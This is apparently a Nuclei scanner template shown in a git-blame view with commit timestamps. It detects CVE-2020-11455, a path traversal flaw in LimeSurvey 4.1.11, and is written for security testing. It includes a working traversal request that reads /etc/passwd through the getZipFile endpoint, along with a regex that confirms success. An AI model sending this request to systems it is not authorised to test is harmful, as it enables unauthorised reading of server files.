2021-07-28 22:43:07 +00:00
id : CVE-2020-11455
info :
2022-07-26 13:45:11 +00:00
name : LimeSurvey 4.1.11 - Local File Inclusion
2021-07-28 22:43:07 +00:00
author : daffainfo
2022-07-30 08:43:08 +00:00
severity : critical
2022-07-26 13:45:11 +00:00
description : LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
2021-08-18 11:37:49 +00:00
reference :
2021-07-28 22:43:07 +00:00
- https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455
2022-05-17 09:18:12 +00:00
- https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b
- http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-11455
2021-09-10 11:26:40 +00:00
classification :
2022-07-30 08:43:08 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-11455
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : cve2020,lfi,edb,packetstorm,cve
2021-07-28 22:43:07 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-28 22:43:07 +00:00
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22